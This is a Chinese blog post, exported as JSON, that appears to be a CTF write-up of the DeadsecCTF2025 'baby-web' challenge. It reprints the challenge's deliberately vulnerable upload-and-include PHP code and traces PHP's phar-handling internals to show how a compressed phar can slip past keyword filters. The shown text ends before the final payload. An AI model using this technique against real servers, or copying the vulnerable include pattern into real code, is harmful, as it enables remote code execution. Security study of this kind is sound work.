{"id":3921,"date":"2025-07-30T00:08:35","date_gmt":"2025-07-29T16:08:35","guid":{"rendered":"https:\/\/fushuling.com\/?p=3921"},"modified":"2025-07-31T15:07:59","modified_gmt":"2025-07-31T07:07:59","slug":"%e5%bd%93include%e9%82%82%e9%80%85phar-deadsecctf2025-baby-web","status":"publish","type":"post","link":"https:\/\/fushuling.com\/index.php\/2025\/07\/30\/%e5%bd%93include%e9%82%82%e9%80%85phar-deadsecctf2025-baby-web\/","title":{"rendered":"\u5f53include\u9082\u9005phar\u2014\u2014DeadsecCTF2025 baby-web"},"content":{"rendered":"\n

\u524d\u8a00<\/h1>\n\n\n\n

\u5f53\u770b\u5b8c\u9646\u961f\u7684The End Of LFI?<\/a>\u540e\uff0c\u672c\u6765\u4ee5\u4e3ainclude\u5df2\u7ecf\u73a9\u4e0d\u51fa\u4ec0\u4e48\u82b1\u6837\u4e86\uff0c\u6ca1\u60f3\u5230php\u4e0d\u6127\u662fphp\uff0c\u603b\u6709\u4f60\u60f3\u4e0d\u5230\u7684\u5404\u79cd\u5947\u5947\u602a\u602a\u7684trick<\/p>\n\n\n\n

\u9898\u76ee\u5185\u5bb9<\/h1>\n\n\n\n

\u9898\u76ee\u7684\u5185\u5bb9\u6bd4\u8f83\u7b80\u5355\uff0c\u4e00\u4e2aindex.php\u548c\u4e00\u4e2aupload.php\uff0c\u548c\u6211\u4e0a\u6b21\u51fa\u7684\u9898\u5dee\u4e0d\u591a\uff08<\/p>\n\n\n\n

<?php\n# index.php\nsession_start();\nerror_reporting(0);\n\nif (!isset($_SESSION['dir'])) {\n    $_SESSION['dir'] = random_bytes(4);\n}\n\nif (!isset($_GET['url'])) {\n    die(\"Nope :<\");\n}\n\n$include_url = basename($_GET['url']);\n$SANDBOX = getcwd() . \"\/uploads\/\" . md5(\"supersafesalt!!!!@#$\" . $_SESSION['dir']);\n\nif (!file_exists($SANDBOX)) {\n    mkdir($SANDBOX);\n}\n\nif (!file_exists($SANDBOX . '\/' . $include_url)) {\n    die(\"Nope :<\");\n}\n\nif (!preg_match(\"\/\\.(zip|bz2|gz|xz|7z)\/i\", $include_url)) {\n    die(\"Nope :<\");\n}\n\n@include($SANDBOX . '\/' . $include_url);\n?><\/code><\/pre>\n\n\n\n
<?php\n# upload.php\nsession_start();\nerror_reporting(0);\n\n$allowed_extensions = ['zip', 'bz2', 'gz', 'xz', '7z'];\n$allowed_mime_types = [\n    'application\/zip',\n    'application\/x-bzip2',\n    'application\/gzip',\n    'application\/x-gzip',\n    'application\/x-xz',\n    'application\/x-7z-compressed',\n];\n\n\nfunction filter($tempfile)\n{\n    $data = file_get_contents($tempfile);\n    if (\n        stripos($data, \"__HALT_COMPILER();\") !== false || stripos($data, \"PK\") !== false ||\n        stripos($data, \"<?\") !== false || stripos(strtolower($data), \"<?php\") !== false\n    ) {\n        return true;\n    }\n    return false;\n}\n\nif (!isset($_SESSION['dir'])) {\n    $_SESSION['dir'] = random_bytes(4);\n}\n\n$SANDBOX = getcwd() . \"\/uploads\/\" . md5(\"supersafesalt!!!!@#$\" . $_SESSION['dir']);\nif (!file_exists($SANDBOX)) {\n    mkdir($SANDBOX);\n}\n\nif ($_SERVER[\"REQUEST_METHOD\"] == 'POST') {\n    if (is_uploaded_file($_FILES['file']['tmp_name'])) {\n        if (filter($_FILES['file']['tmp_name']) || !isset($_FILES['file']['name'])) {\n            die(\"Nope :<\");\n        }\n\n        \/\/ mimetype check\n        $finfo = finfo_open(FILEINFO_MIME_TYPE);\n        $mime_type = finfo_file($finfo, $_FILES['file']['tmp_name']);\n        finfo_close($finfo);\n\n        if (!in_array($mime_type, $allowed_mime_types)) {\n            die('Nope :<');\n        }\n\n        \/\/ ext check\n        $ext = strtolower(pathinfo(basename($_FILES['file']['name']), PATHINFO_EXTENSION));\n\n        if (!in_array($ext, $allowed_extensions)) {\n            die('Nope :<');\n        }\n\n        if (move_uploaded_file($_FILES['file']['tmp_name'], \"$SANDBOX\/\" . basename($_FILES['file']['name']))) {\n            echo \"File upload success!\";\n        }\n    }\n}\n?>\n\n<form enctype='multipart\/form-data' action='upload.php' method='post'>\n    <input type='file' name='file'>\n    <input type=\"submit\" value=\"upload\"><\/p>\n<\/form><\/code><\/pre>\n\n\n\n
\u7136\u540edocker\u73af\u5883\u4e5f\u975e\u5e38\u7b80\u5355\uff0c\u6ca1\u6709\u914d\u4ec0\u4e48\u5947\u602a\u7684\u4e1c\u897f\uff0c\u5168\u662f\u9ed8\u8ba4\u914d\u7f6e\uff0cphp\u7248\u672c\u4e5f\u975e\u5e38\u9ad8\uff0c\u57fa\u672c\u4e0a\u80fd\u60f3\u5230\u7684\u4e00\u4e9b\u7ed5\u8fc7trick\u90fd\u7ed5\u4e0d\u4e86\uff1a<\/p>\n\n\n\n
FROM php:8.2-apache  \n\nRUN DEBIAN_FRONTEND=noninteractive apt-get update && \\\n    apt-get install -y \\\n    gcc \\ \n    libbz2-dev && \\\n    docker-php-ext-install bz2 && \\\n    rm -rf \/var\/lib\/apt\/lists\/\n\nRUN rm -rf \/var\/www\/html\/*\n\nCOPY flag.txt readflag.c \/\nRUN gcc -o \/readflag \/readflag.c && \\\n    rm \/readflag.c\n\nRUN chown 0:1337 \/flag.txt \/readflag && \\\n    chmod 040 \/flag.txt && \\\n    chmod 2555 \/readflag\n\nCOPY src\/index.php src\/upload.php \/var\/www\/html\/\n\nRUN chown -R root:root \/var\/www && \\\n    find \/var\/www -type d -exec chmod 555 {} \\; && \\\n    find \/var\/www -type f -exec chmod 444 {} \\; && \\\n    mkdir \/var\/www\/html\/uploads && \\\n    chmod 703 \/var\/www\/html\/uploads\n\nRUN find \/ -ignore_readdir_race -type f \\( -perm -4000 -o -perm -2000 \\) -not -wholename \/readflag -delete\nUSER www-data\nRUN (find --version && id --version && sed --version && grep --version) > \/dev\/null\nUSER root\n\nEXPOSE 80\nCOPY entrypoint.sh \/entrypoint.sh\nRUN chmod +x \/entrypoint.sh\nENTRYPOINT [\"\/entrypoint.sh\"]\n<\/code><\/pre>\n\n\n\n
\u7b80\u5355\u6765\u8bf4\uff0c\u6211\u4eec\u53ef\u4ee5\u4e0a\u4f20\u4e00\u4e2a\u6587\u4ef6\uff0c\u4f46\u5fc5\u987b\u662f'zip', 'bz2', 'gz', 'xz', '7z'<\/code>\u5176\u4e2d\u4e4b\u4e00\uff0c\u5e76\u4e14\u4e25\u683c\u68c0\u67e5\u4e86\u4f60\u4e0a\u4f20\u7684\u6587\u4ef6\u91cc\u7684\u5173\u952e\u5b57\uff0c\u4e0d\u80fd\u51fa\u73b0__HALT_COMPILER()<\/code>\u3001PK<\/code>\u3001<?<\/code>\u548c<?php<\/code>\uff0c\u5982\u679c\u901a\u8fc7\u9a8c\u8bc1\uff0c\u4f1a\u4f7f\u7528$include_url = basename($_GET['url'])<\/code>\u83b7\u53d6\u5230\u6587\u4ef6\u7136\u540e\u7528@include($SANDBOX . '\/' . $include_url)<\/code>\u8fdb\u884cinclude<\/p>\n\n\n\n
\u96be\u70b9\u5f88\u660e\u663e\uff0c\u4f7f\u7528\u4e86basename<\/code>\u83b7\u53d6\u6587\u4ef6\u540d\uff0c\u800c\u4e14\u6700\u540einclude\u7684\u8fd8\u662f$SANDBOX . '\/' . $include_url<\/code>\uff0c\u56e0\u6b64\u6211\u4eec\u8fd9\u91cc\u662f\u6ca1\u529e\u6cd5\u4f7f\u7528\u4f2a\u534f\u8bae\u7684\uff0c\u6bd4\u5982\u4ec0\u4e48phar:\/\/<\/code>\uff0c\u538b\u6839\u6ca1\u6709\u53ef\u63a7\u70b9\u3002\u5176\u6b21\u6211\u4eec\u4e0a\u4f20\u7684\u6587\u4ef6\u91cc\u88ab\u8fc7\u6ee4\u4e86\u5173\u952e\u5b57\uff0c\u7279\u522b\u662f<?<\/code>\uff0c\u5e76\u4e14\u5bf9\u5e94\u7684\u73af\u5883\u91cc\u53ea\u80fd\u7528<?php<\/code>\u5f53\u4f5cphp\u6807\u7b7e\uff0c\u5176\u4ed6\u9a9a\u64cd\u4f5c\u6bd4\u5982<script language=\"php\"><\/code>\u3001<% %><\/code>\u662f\u89e3\u6790\u4e0d\u4e86\u7684\u3002\u800c\u4e14\u8fd9\u91cc\u7684\u4ee3\u7801\u91cc\u4e5f\u6ca1\u6709\u4ec0\u4e48\u89e3\u538b\u64cd\u4f5c\uff0c\u4e0a\u4f20\u4e86\u5565\u6587\u4ef6\u5c31\u662finclude\u4e86\u5565\u6587\u4ef6\uff0c\u5bfc\u81f4\u5173\u952e\u5b57\u7ed5\u8fc7\u51e0\u4e4e\u6210\u4e86\u4e0d\u53ef\u80fd\u7684\u4e8b\uff0c\u53cd\u6b63\u6211\u5f53\u65f6\u662f\u6ca1\u505a\u51fa\u6765\uff0c\u8fd8\u662f\u592a\u83dc\u4e86\u3002<\/p>\n\n\n\n
\u6df1\u5165include\u5e95\u5c42<\/h1>\n\n\n\n
\u4e0b\u4e00\u4efdphp\u6e90\u7801\uff1ahttps:\/\/github.com\/php\/php-src\/archive\/refs\/tags\/php-8.3.23.zip<\/a><\/p>\n\n\n\n
\u5f53\u6211\u4eecinclude\u4e00\u4e2a\u6587\u4ef6\u7684\u65f6\u5019\uff0c\u4f1a\u8c03\u7528\u4e00\u4e2a\u53eb\u505acompile_filename<\/code>\u7684\u65b9\u6cd5\uff1a<\/p>\n\n\n\n
zend_op_array *compile_filename(int type, zend_string *filename)\n{\n\tzend_file_handle file_handle;\n\tzend_op_array *retval;\n\tzend_string *opened_path = NULL;\n\n\tzend_stream_init_filename_ex(&file_handle, filename);\n\n\tretval = zend_compile_file(&file_handle, type);\n\tif (retval && file_handle.handle.stream.handle) {\n\t\tif (!file_handle.opened_path) {\n\t\t\tfile_handle.opened_path = opened_path = zend_string_copy(filename);\n\t\t}\n\n\t\tzend_hash_add_empty_element(&EG(included_files), file_handle.opened_path);\n\n\t\tif (opened_path) {\n\t\t\tzend_string_release_ex(opened_path, 0);\n\t\t}\n\t}\n\tzend_destroy_file_handle(&file_handle);\n\n\treturn retval;\n}<\/code><\/pre>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u8fd9\u4e2a\u51fd\u6570 compile_filename<\/code> \u662f Zend \u5f15\u64ce\uff08PHP \u5185\u6838\uff09\u7684\u4e00\u4e2a\u5185\u90e8\u51fd\u6570\uff0c\u4ed6\u7684\u4f5c\u7528\u662f\u7f16\u8bd1\u7ed9\u5b9a\u7684 PHP \u6587\u4ef6\uff0c\u8fd4\u56de\u5176\u5bf9\u5e94\u7684 zend_op_array\uff08\u5373\u53ef\u6267\u884c\u7684\u4e2d\u95f4\u4ee3\u7801\uff09\uff0c\u5e76\u5c06\u6587\u4ef6\u8def\u5f84\u52a0\u5165\u5168\u5c40\u5df2\u5305\u542b\u6587\u4ef6\u5217\u8868\uff0c\u9632\u6b62\u91cd\u590d include\uff0c\u53ef\u4ee5\u770b\u5230\u5176\u4e2d\u6709\u4e00\u884c\u8c03\u7528\u4e86zend_compile_file<\/code>\uff0c\u987e\u540d\u601d\u4e49\uff0c\u5b83\u7684\u4f5c\u7528\u662f\u4f7f\u7528 Zend \u7684\u7f16\u8bd1\u5668\u7f16\u8bd1\u8fd9\u4e2a\u6587\u4ef6\u3002<\/p>\n\n\n\n
\u7ee7\u7eed\u5b9a\u4f4d\u5230phar\u5bf9\u5e94\u7684\u7f16\u8bd1\u65b9\u6cd5\uff0c\u9700\u8981\u770b\u5230phar_compile_file<\/code>\uff1a<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
static zend_op_array *phar_compile_file(zend_file_handle *file_handle, int type) \/* {{{ *\/\n{\n\tzend_op_array *res;\n\tzend_string *name = NULL;\n\tint failed;\n\tphar_archive_data *phar;\n\n\tif (!file_handle || !file_handle->filename) {\n\t\treturn phar_orig_compile_file(file_handle, type);\n\t}\n\tif (strstr(ZSTR_VAL(file_handle->filename), \".phar\") && !strstr(ZSTR_VAL(file_handle->filename), \":\/\/\")) {\n\t\tif (SUCCESS == phar_open_from_filename(ZSTR_VAL(file_handle->filename), ZSTR_LEN(file_handle->filename), NULL, 0, 0, &phar, NULL)) {\n\t\t\tif (phar->is_zip || phar->is_tar) {\n\t\t\t\tzend_file_handle f;\n\n\t\t\t\t\/* zip or tar-based phar *\/\n\t\t\t\tname = zend_strpprintf(4096, \"phar:\/\/%s\/%s\", ZSTR_VAL(file_handle->filename), \".phar\/stub.php\");\n\t\t\t\tzend_stream_init_filename_ex(&f, name);\n\t\t\t\tif (SUCCESS == zend_stream_open_function(&f)) {\n\t\t\t\t\tzend_string_release(f.filename);\n\t\t\t\t\tf.filename = file_handle->filename;\n\t\t\t\t\tif (f.opened_path) {\n\t\t\t\t\t\tzend_string_release(f.opened_path);\n\t\t\t\t\t}\n\t\t\t\t\tf.opened_path = file_handle->opened_path;\n\n\t\t\t\t\tswitch (file_handle->type) {\n\t\t\t\t\t\tcase ZEND_HANDLE_STREAM:\n\t\t\t\t\t\t\tif (file_handle->handle.stream.closer && file_handle->handle.stream.handle) {\n\t\t\t\t\t\t\t\tfile_handle->handle.stream.closer(file_handle->handle.stream.handle);\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tfile_handle->handle.stream.handle = NULL;\n\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\tdefault:\n\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\t\t\t\t\t*file_handle = f;\n\t\t\t\t}\n\t\t\t} else if (phar->flags & PHAR_FILE_COMPRESSION_MASK) {\n\t\t\t\t\/* compressed phar *\/\n\t\t\t\tfile_handle->type = ZEND_HANDLE_STREAM;\n\t\t\t\t\/* we do our own reading directly from the phar, don't change the next line *\/\n\t\t\t\tfile_handle->handle.stream.handle  = phar;\n\t\t\t\tfile_handle->handle.stream.reader  = phar_zend_stream_reader;\n\t\t\t\tfile_handle->handle.stream.closer  = NULL;\n\t\t\t\tfile_handle->handle.stream.fsizer  = phar_zend_stream_fsizer;\n\t\t\t\tfile_handle->handle.stream.isatty  = 0;\n\t\t\t\tphar->is_persistent ?\n\t\t\t\t\tphp_stream_rewind(PHAR_G(cached_fp)[phar->phar_pos].fp) :\n\t\t\t\t\tphp_stream_rewind(phar->fp);\n\t\t\t}\n\t\t}\n\t}\n\n\tzend_try {\n\t\tfailed = 0;\n\t\tCG(zend_lineno) = 0;\n\t\tres = phar_orig_compile_file(file_handle, type);\n\t} zend_catch {\n\t\tfailed = 1;\n\t\tres = NULL;\n\t} zend_end_try();\n\n\tif (name) {\n\t\tzend_string_release(name);\n\t}\n\n\tif (failed) {\n\t\tzend_bailout();\n\t}\n\n\treturn res;\n}<\/code><\/pre>\n\n\n\n
\u53ef\u4ee5\u770b\u5230\u5f53\u4ed6\u5224\u65ad\u5230strstr(ZSTR_VAL(file_handle->filename), \".phar\")<\/code>\uff0c\u4e5f\u5c31\u662f\u53d1\u73b0\u6587\u4ef6\u540d\u4e2d\u5305\u542b\u5b57\u7b26\u4e32 .phar<\/code>\uff0c\u4f1a\u8c03\u7528phar_open_from_filename<\/code>\uff0c\u7ee7\u7eed\u8ddfphar_open_from_filename<\/code>\uff1a<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u53ef\u4ee5\u770b\u5230\u8fd9\u91cc\u8c03\u7528\u4e86\u4e00\u4e2a\u53ebphar_open_from_fp<\/code>\u7684\u4e1c\u897f\uff0c\u7ee7\u7eed\u8ddf\u4e00\u4e0b\uff1a<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
static int phar_open_from_fp(php_stream* fp, char *fname, size_t fname_len, char *alias, size_t alias_len, uint32_t options, phar_archive_data** pphar, int is_data, char **error) \/* {{{ *\/\n{\n\tstatic const char token[] = \"__HALT_COMPILER();\";\n\tstatic const char zip_magic[] = \"PK\\x03\\x04\";\n\tstatic const char gz_magic[] = \"\\x1f\\x8b\\x08\";\n\tstatic const char bz_magic[] = \"BZh\";\n\tchar *pos, test = '\\0';\n\tint recursion_count = 3; \/\/ arbitrary limit to avoid too deep or even infinite recursion\n\tconst int window_size = 1024;\n\tchar buffer[1024 + sizeof(token)]; \/* a 1024 byte window + the size of the halt_compiler token (moving window) *\/\n\tconst zend_long readsize = sizeof(buffer) - sizeof(token);\n\tconst zend_long tokenlen = sizeof(token) - 1;\n\tzend_long halt_offset;\n\tsize_t got;\n\tuint32_t compression = PHAR_FILE_COMPRESSED_NONE;\n\n\tif (error) {\n\t\t*error = NULL;\n\t}\n\n\tif (-1 == php_stream_rewind(fp)) {\n\t\tMAPPHAR_ALLOC_FAIL(\"cannot rewind phar \\\"%s\\\"\")\n\t}\n\n\tbuffer[sizeof(buffer)-1] = '\\0';\n\tmemset(buffer, 32, sizeof(token));\n\thalt_offset = 0;\n\n\t\/* Maybe it's better to compile the file instead of just searching,  *\/\n\t\/* but we only want the offset. So we want a .re scanner to find it. *\/\n\twhile(!php_stream_eof(fp)) {\n\t\tif ((got = php_stream_read(fp, buffer+tokenlen, readsize)) < (size_t) tokenlen) {\n\t\t\tMAPPHAR_ALLOC_FAIL(\"internal corruption of phar \\\"%s\\\" (truncated entry)\")\n\t\t}\n\n\t\tif (!test && recursion_count) {\n\t\t\ttest = '\\1';\n\t\t\tpos = buffer+tokenlen;\n\t\t\tif (!memcmp(pos, gz_magic, 3)) {\n\t\t\t\tchar err = 0;\n\t\t\t\tphp_stream_filter *filter;\n\t\t\t\tphp_stream *temp;\n\t\t\t\t\/* to properly decompress, we have to tell zlib to look for a zlib or gzip header *\/\n\t\t\t\tzval filterparams;\n\n\t\t\t\tif (!PHAR_G(has_zlib)) {\n\t\t\t\t\tMAPPHAR_ALLOC_FAIL(\"unable to decompress gzipped phar archive \\\"%s\\\" to temporary file, enable zlib extension in php.ini\")\n\t\t\t\t}\n\t\t\t\tarray_init(&filterparams);\n\/* this is defined in zlib's zconf.h *\/\n#ifndef MAX_WBITS\n#define MAX_WBITS 15\n#endif\n\t\t\t\tadd_assoc_long_ex(&filterparams, \"window\", sizeof(\"window\") - 1, MAX_WBITS + 32);\n\n\t\t\t\t\/* entire file is gzip-compressed, uncompress to temporary file *\/\n\t\t\t\tif (!(temp = php_stream_fopen_tmpfile())) {\n\t\t\t\t\tMAPPHAR_ALLOC_FAIL(\"unable to create temporary file for decompression of gzipped phar archive \\\"%s\\\"\")\n\t\t\t\t}\n\n\t\t\t\tphp_stream_rewind(fp);\n\t\t\t\tfilter = php_stream_filter_create(\"zlib.inflate\", &filterparams, php_stream_is_persistent(fp));\n\n\t\t\t\tif (!filter) {\n\t\t\t\t\terr = 1;\n\t\t\t\t\tadd_assoc_long_ex(&filterparams, \"window\", sizeof(\"window\") - 1, MAX_WBITS);\n\t\t\t\t\tfilter = php_stream_filter_create(\"zlib.inflate\", &filterparams, php_stream_is_persistent(fp));\n\t\t\t\t\tzend_array_destroy(Z_ARR(filterparams));\n\n\t\t\t\t\tif (!filter) {\n\t\t\t\t\t\tphp_stream_close(temp);\n\t\t\t\t\t\tMAPPHAR_ALLOC_FAIL(\"unable to decompress gzipped phar archive \\\"%s\\\", ext\/zlib is buggy in PHP versions older than 5.2.6\")\n\t\t\t\t\t}\n\t\t\t\t} else {\n\t\t\t\t\tzend_array_destroy(Z_ARR(filterparams));\n\t\t\t\t}\n\n\t\t\t\tphp_stream_filter_append(&temp->writefilters, filter);\n\n\t\t\t\tif (SUCCESS != php_stream_copy_to_stream_ex(fp, temp, PHP_STREAM_COPY_ALL, NULL)) {\n\t\t\t\t\tphp_stream_filter_remove(filter, 1);\n\t\t\t\t\tif (err) {\n\t\t\t\t\t\tphp_stream_close(temp);\n\t\t\t\t\t\tMAPPHAR_ALLOC_FAIL(\"unable to decompress gzipped phar archive \\\"%s\\\", ext\/zlib is buggy in PHP versions older than 5.2.6\")\n\t\t\t\t\t}\n\t\t\t\t\tphp_stream_close(temp);\n\t\t\t\t\tMAPPHAR_ALLOC_FAIL(\"unable to decompress gzipped phar archive \\\"%s\\\" to temporary file\")\n\t\t\t\t}\n\n\t\t\t\tphp_stream_filter_flush(filter, 1);\n\t\t\t\tphp_stream_filter_remove(filter, 1);\n\t\t\t\tphp_stream_close(fp);\n\t\t\t\tfp = temp;\n\t\t\t\tphp_stream_rewind(fp);\n\t\t\t\tcompression = PHAR_FILE_COMPRESSED_GZ;\n\n\t\t\t\t\/* now, start over *\/\n\t\t\t\ttest = '\\0';\n\t\t\t\tif (!--recursion_count) {\n\t\t\t\t\tMAPPHAR_ALLOC_FAIL(\"unable to decompress gzipped phar archive \\\"%s\\\"\");\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\tcontinue;\n\t\t\t} else if (!memcmp(pos, bz_magic, 3)) {\n\t\t\t\tphp_stream_filter *filter;\n\t\t\t\tphp_stream *temp;\n\n\t\t\t\tif (!PHAR_G(has_bz2)) {\n\t\t\t\t\tMAPPHAR_ALLOC_FAIL(\"unable to decompress bzipped phar archive \\\"%s\\\" to temporary file, enable bz2 extension in php.ini\")\n\t\t\t\t}\n\n\t\t\t\t\/* entire file is bzip-compressed, uncompress to temporary file *\/\n\t\t\t\tif (!(temp = php_stream_fopen_tmpfile())) {\n\t\t\t\t\tMAPPHAR_ALLOC_FAIL(\"unable to create temporary file for decompression of bzipped phar archive \\\"%s\\\"\")\n\t\t\t\t}\n\n\t\t\t\tphp_stream_rewind(fp);\n\t\t\t\tfilter = php_stream_filter_create(\"bzip2.decompress\", NULL, php_stream_is_persistent(fp));\n\n\t\t\t\tif (!filter) {\n\t\t\t\t\tphp_stream_close(temp);\n\t\t\t\t\tMAPPHAR_ALLOC_FAIL(\"unable to decompress bzipped phar archive \\\"%s\\\", filter creation failed\")\n\t\t\t\t}\n\n\t\t\t\tphp_stream_filter_append(&temp->writefilters, filter);\n\n\t\t\t\tif (SUCCESS != php_stream_copy_to_stream_ex(fp, temp, PHP_STREAM_COPY_ALL, NULL)) {\n\t\t\t\t\tphp_stream_filter_remove(filter, 1);\n\t\t\t\t\tphp_stream_close(temp);\n\t\t\t\t\tMAPPHAR_ALLOC_FAIL(\"unable to decompress bzipped phar archive \\\"%s\\\" to temporary file\")\n\t\t\t\t}\n\n\t\t\t\tphp_stream_filter_flush(filter, 1);\n\t\t\t\tphp_stream_filter_remove(filter, 1);\n\t\t\t\tphp_stream_close(fp);\n\t\t\t\tfp = temp;\n\t\t\t\tphp_stream_rewind(fp);\n\t\t\t\tcompression = PHAR_FILE_COMPRESSED_BZ2;\n\n\t\t\t\t\/* now, start over *\/\n\t\t\t\ttest = '\\0';\n\t\t\t\tif (!--recursion_count) {\n\t\t\t\t\tMAPPHAR_ALLOC_FAIL(\"unable to decompress bzipped phar archive \\\"%s\\\"\");\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\tcontinue;\n\t\t\t}\n\n\t\t\tif (!memcmp(pos, zip_magic, 4)) {\n\t\t\t\tphp_stream_seek(fp, 0, SEEK_END);\n\t\t\t\treturn phar_parse_zipfile(fp, fname, fname_len, alias, alias_len, pphar, error);\n\t\t\t}\n\n\t\t\tif (got >= 512) {\n\t\t\t\tif (phar_is_tar(pos, fname)) {\n\t\t\t\t\tphp_stream_rewind(fp);\n\t\t\t\t\treturn phar_parse_tarfile(fp, fname, fname_len, alias, alias_len, pphar, is_data, compression, error);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tif (got > 0 && (pos = phar_strnstr(buffer, got + sizeof(token), token, sizeof(token)-1)) != NULL) {\n\t\t\thalt_offset += (pos - buffer); \/* no -tokenlen+tokenlen here *\/\n\t\t\treturn phar_parse_pharfile(fp, fname, fname_len, alias, alias_len, halt_offset, pphar, compression, error);\n\t\t}\n\n\t\thalt_offset += got;\n\t\tmemmove(buffer, buffer + window_size, tokenlen); \/* move the memory buffer by the size of the window *\/\n\t}\n\n\tMAPPHAR_ALLOC_FAIL(\"internal corruption of phar \\\"%s\\\" (__HALT_COMPILER(); not found)\")\n}<\/code><\/pre>\n\n\n\n
\u76f4\u63a5\u8ba9ai\u5e2e\u6211\u89e3\u91ca\u4e00\u4e0b\uff1aphar_open_from_fp()<\/code> \u662f\u7528\u4e8e\u4ece\u4e00\u4e2a php_stream<\/code>\uff08\u5373\u6253\u5f00\u7684\u6587\u4ef6\u6d41\uff09\u4e2d\u89e3\u6790\u5e76\u6253\u5f00\u4e00\u4e2a Phar \u6587\u4ef6\uff08PHP Archive\uff09\u7684\u51fd\u6570\uff1a<\/p>\n\n\n\n
\u6253\u5f00 phar \u6587\u4ef6\u6d41\n   \u2193\n\u5c1d\u8bd5 rewind \u5230\u8d77\u59cb\u4f4d\u7f6e\n   \u2193\n\u662f\u5426 gzip\uff1f\u2192 \u89e3\u538b \u2192 rewind\n\u662f\u5426 bzip2\uff1f\u2192 \u89e3\u538b \u2192 rewind\n\u662f\u5426 zip\uff1f\u2192 phar_parse_zipfile\n\u662f\u5426 tar\uff1f\u2192 phar_parse_tarfile\n   \u2193\n\u626b\u63cf __HALT_COMPILER();\n   \u2193\n\u627e\u5230\u4e86 \u2192 phar_parse_pharfile()\n\u627e\u4e0d\u5230 \u2192 \u62a5\u9519\u5e76\u9000\u51fa<\/code><\/pre>\n\n\n\n
\u4f60\u53ef\u80fd\u4f1a\u5947\u602a\u4e00\u4e2a\u4e8b\uff0c\u660e\u660e\u51fd\u6570\u53eb phar_open_from_fp<\/code>\uff0c\u4e0d\u662f\u201c\u6253\u5f00 Phar \u6587\u4ef6\u201d\u7684\u5417\uff1f\u4e3a\u4ec0\u4e48\u8fd8\u8981\u5224\u65ad gzip\u3001bzip2\u3001zip\u3001tar \u5462\uff1f\u8fd9\u4e9b\u4e0d\u662f\u975e Phar \u5417\uff1f\u5176\u5b9e\u8fd9\u4e9b\u683c\u5f0f\u4e5f\u53ef\u4ee5\u662f\u5408\u6cd5\u7684 Phar \u6587\u4ef6\u5bb9\u5668\uff0cPhar \u6587\u4ef6\u672c\u8d28\u4e0a\u662f\u5bb9\u5668\u683c\u5f0f\uff0c\u4e0d\u662f\u6587\u4ef6\u540e\u7f00\u51b3\u5b9a\u7684\uff0cPHP \u7684 Phar \u6269\u5c55\u652f\u6301\u5c06\u4e00\u4e2a Phar \u6587\u4ef6\u5c01\u88c5\u6210\u4ee5\u4e0b\u51e0\u79cd\u683c\u5f0f\uff1a<\/p>\n\n\n\n
\u6587\u4ef6\u7ed3\u6784<\/th>\u662f\u5426\u652f\u6301\u4f5c\u4e3a Phar<\/th>\u662f\u5426\u9700\u8981\u7279\u6b8a\u5904\u7406<\/th><\/tr><\/thead>
\u7eaf PHP \u811a\u672c\uff08\u6709 __HALT_COMPILER();<\/code>\uff09<\/td>\u2705<\/td>\u9ed8\u8ba4\u652f\u6301<\/td><\/tr>
gzip \u538b\u7f29\u7684 Phar<\/td>\u2705<\/td>\u9700\u8981\u89e3\u538b<\/td><\/tr>
bzip2 \u538b\u7f29\u7684 Phar<\/td>\u2705<\/td>\u9700\u8981\u89e3\u538b<\/td><\/tr>
tar \u683c\u5f0f\u7684\u6253\u5305<\/td>\u2705<\/td>\u7528 .phar.tar<\/code> \u6216 .tar.phar<\/code><\/td><\/tr>
zip \u683c\u5f0f\u7684\u6253\u5305<\/td>\u2705<\/td>.phar.zip<\/code> \u6216 .zip.phar<\/code><\/td><\/tr>
\u5b8c\u5168\u4e0d\u662f Phar<\/td>\u274c<\/td>\u62a5\u9519<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
\u6bd4\u5982\u4e0b\u9762\u662f\u4e00\u4e2a\u5408\u6cd5\u7684 gzip \u538b\u7f29 Phar\uff1a<\/p>\n\n\n\n
php -d phar.readonly=0 -r '\n    $phar = new Phar(\"test.phar\");\n    $phar[\"index.php\"] = \"<?php echo 123;\";\n    $phar->setStub(\"<?php __HALT_COMPILER(); ?>\");\n    $phar->compress(Phar::GZ);  \/\/ \u5173\u952e\uff01\n'<\/code><\/pre>\n\n\n\n
\u751f\u6210\u7684 test.phar<\/code>\uff1a<\/p>\n\n\n\n
    \n
  • \u5916\u8868\u662f gzip \u683c\u5f0f\uff1b<\/li>\n\n\n\n
  • \u91cc\u9762\u662f tar + Phar \u5143\u6570\u636e\uff1b<\/li>\n\n\n\n
  • PHP \u6253\u5f00\u5b83\u7684\u65f6\u5019\u5c31\u9700\u8981\uff1a\n
      \n
    1. \u5224\u65ad\u662f gzip\uff1b<\/li>\n\n\n\n
    2. \u89e3\u538b\u5230\u4e34\u65f6\u6d41\uff1b<\/li>\n\n\n\n
    3. \u518d\u7ee7\u7eed\u626b\u63cf __HALT_COMPILER();<\/code> \u6216 tar header\uff1b<\/li>\n<\/ol>\n<\/li>\n<\/ul>\n\n\n\n
      \u8981\u662f\u6211\u4eec\u6253\u5305\u6210\u4e86zip\uff0c\u90a3\u4e48 PHP \u4f1a\u8bc6\u522b\u6210 zip\uff0c\u901a\u8fc7 phar_parse_zipfile()<\/code> \u53bb\u89e3\u6790\u3002<\/p>\n\n\n\n
